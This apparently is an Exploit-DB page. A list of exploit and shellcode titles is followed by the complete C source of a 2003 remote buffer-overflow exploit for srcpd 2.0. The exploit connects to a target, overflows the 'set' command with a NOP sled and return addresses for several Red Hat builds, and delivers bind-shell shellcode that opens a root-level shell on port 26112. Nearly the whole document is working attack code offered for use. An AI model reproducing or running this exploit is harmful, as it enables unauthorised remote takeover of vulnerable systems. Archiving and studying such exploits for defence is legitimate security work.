880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
165 lines
No EOL
4.4 KiB
C
165 lines
No EOL
4.4 KiB
C
// source: https://www.securityfocus.com/bid/8467/info
|
|
|
|
Several stack-based buffer overflow vulnerabilities exist in multiple srcpd commands that may allow an attacker to run arbitrary code on a vulnerable host. The vulnerability is due to the lack of boundary checking in the affected functions, leading to stack overflow conditions.
|
|
|
|
An attacker may succesfully exploit this issue in order to gain access to a vulnerable system.
|
|
|
|
/*
|
|
* m00 Security
|
|
* www.m00security.org
|
|
* srcpd =< 2.0 remote exploit
|
|
*
|
|
* Audited by h0snp && Over_G.
|
|
* Programmed by h0snp.
|
|
* 2003.
|
|
* ----------
|
|
* Contact: #m00 at irc.wom.ru
|
|
*/
|
|
|
|
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <getopt.h>
|
|
|
|
#define SCODELEN 148
|
|
#define NOP 0x90
|
|
#define RET 0xbf1fcb61
|
|
|
|
|
|
|
|
|
|
|
|
|
|
unsigned long int resolve(char *host)
|
|
{
|
|
long i;
|
|
struct hostent *he;
|
|
|
|
i = inet_addr(host);
|
|
if (i < 0)
|
|
{
|
|
he = gethostbyname(host);
|
|
if (!he) return (0);
|
|
else return (*(unsigned long *)he->h_addr);
|
|
}
|
|
return (i);
|
|
}
|
|
|
|
|
|
int make_connect(char *address, unsigned short port)
|
|
{
|
|
int sock,i;
|
|
struct sockaddr_in peer;
|
|
|
|
sock = socket(AF_INET,SOCK_STREAM,0);
|
|
if (sock <= 0) return -1;
|
|
|
|
if (!(i = resolve(address))) return -2;
|
|
else
|
|
{
|
|
peer.sin_family = AF_INET;
|
|
peer.sin_addr.s_addr = i;
|
|
peer.sin_port = htons(port);
|
|
}
|
|
if (!(connect(sock,(struct sockaddr *)&peer,sizeof peer))) return (sock);
|
|
else { close(sock); return -3; }
|
|
}
|
|
|
|
unsigned char scode[]=
|
|
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x1\x51\xb1\x6\x51\xb1\x1"
|
|
"\x51\xb1\x2\x51\x8d\xc\x24\xcd\x80\xb3\x2\xb1\x2\x31\xc9\x51\x51\x51\x80"
|
|
"\xc1\x66\x66\x51\xb1\x2\x66\x51\x8d\xc\x24\xb2\x10\x52\x51\x50\x8d\xc\x24"
|
|
"\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3\x1\x53\x52\x8d\xc\x24\x31\xc0\xb0\x66"
|
|
"\x80\xc3\x3\xcd\x80\x31\xc0\x50\x50\x52\x8d\xc\x24\xb3\x5\xb0\x66\xcd\x80"
|
|
"\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\x31"
|
|
"\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x8"
|
|
"\x31\xc9\x51\x53\x8d\xc\x24\x31\xc0\xb0\xb\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
|
|
|
|
|
|
long get_esp(){ __asm__ ("movl %esp,%eax"); }
|
|
|
|
struct
|
|
{
|
|
char* type;
|
|
long ret;
|
|
unsigned int rep;
|
|
} targets[]=
|
|
{
|
|
{"Red Hat Linux 9.0 x86 srcpd 2.0 (build gcc 3.2.2)",RET,13},
|
|
{"Red Hat Linux 9.0 x86 srcpd 2.0 (from rpm)",0xbf1fcba1,6},
|
|
{"Red Hat Linux 7.3 x86 srcpd 2.0 (from rpm)",0x42931b51,6},
|
|
}, dumb;
|
|
|
|
void usage(char* name)
|
|
{
|
|
int i;
|
|
|
|
printf("\rSrcpd v2.0 remote exploit by m00 Security\n");
|
|
printf("usage: %s -h <host> -p <port> -t <target> [-o <offset>] \n",name);
|
|
printf("avialable targets:\n");
|
|
for (i =0; i< sizeof(targets)/sizeof(dumb); i++)
|
|
printf(" %3d / 0x%.8x / %s \n",i,targets[i].ret,targets[i].type);
|
|
exit(0);
|
|
}
|
|
|
|
|
|
|
|
int main(int argc, char* argv[])
|
|
{
|
|
char* host,*buf,*rcvbuf;
|
|
long ret = RET/*get_esp()*/,*addr;
|
|
int rez,port=12340,sock,pos,i,trgt;
|
|
|
|
if (argc < 4) usage(argv[0]);
|
|
|
|
while ((rez = getopt(argc,argv,"h:p:o:t:")) != -1)
|
|
switch (rez)
|
|
{
|
|
case 'h': host = optarg; break;
|
|
case 'p': port = atoi(optarg); break;
|
|
case 'o': ret -= atol(optarg); break;
|
|
case 't': trgt = atoi(optarg); break;
|
|
case '?': break;
|
|
}
|
|
printf(" ** ***************************************** **\n");
|
|
printf(" ** Srcpd v2.0 remote exploit by m00 Security **\n");
|
|
printf(" ** ***************************************** **\n");
|
|
printf(" Conneting...");
|
|
if ((sock = make_connect(host,port)) <= 0)
|
|
{
|
|
perror(" connect()");
|
|
exit(-1);
|
|
}
|
|
ret = targets[trgt].ret;
|
|
printf("OK\n using RET = 0x%x\n",ret);
|
|
buf = (char*)malloc(220);
|
|
rcvbuf = (char*)malloc(512);
|
|
pos = recv(sock,rcvbuf,512,0);
|
|
printf(" Sending...");
|
|
if (pos <= 0 || pos == EOF) return -1;
|
|
send(sock,"go 11111\r\n",10,0);
|
|
pos = recv(sock,rcvbuf,512,0);
|
|
if (pos <= 0 || pos == EOF) return -1;
|
|
memset(buf,NOP,200);
|
|
memcpy(buf,"set 1 lock ",11);
|
|
addr = (long*)(buf+11);
|
|
for (i =0; i< targets[trgt].rep; i++)
|
|
*(addr++) = ret;
|
|
*(addr++) = '\x20';
|
|
memcpy(buf+targets[trgt].rep*4+12,scode,SCODELEN);
|
|
buf[219] = '\0';
|
|
printf("OK\n");
|
|
send(sock,buf,220,0);
|
|
printf(" now, if you was lucky with ret, shell spawned on 26112.\n");
|
|
free(buf);
|
|
free(rcvbuf);
|
|
close(sock);
|
|
return 0;
|
|
} |